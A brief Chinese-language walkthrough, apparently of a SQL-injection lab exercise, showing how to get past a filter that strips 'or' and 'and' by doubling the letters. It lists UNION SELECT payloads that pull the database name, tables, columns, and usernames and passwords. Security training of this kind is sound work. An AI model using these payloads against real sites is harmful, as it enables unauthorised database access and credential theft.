1.OR&AND欺骗
(1)测试一下
?id=1' #
?id=1' --+
看到id周围是单引号,但是第二种没有报错,可以注入
看一下php,发现会把or 和and 转义成空格
2.--+绕过,双写or和and
(1)爆库:?id=-1' union select 1,2,database()--+
(2)爆表:?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security" --+
(3)爆列名:?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+
(4)爆值:
?id=-1' union select 1,2,group_concat(passwoorrd)from security.users --+
?id=-1' union select 1,2,group_concat(username)from security.users --+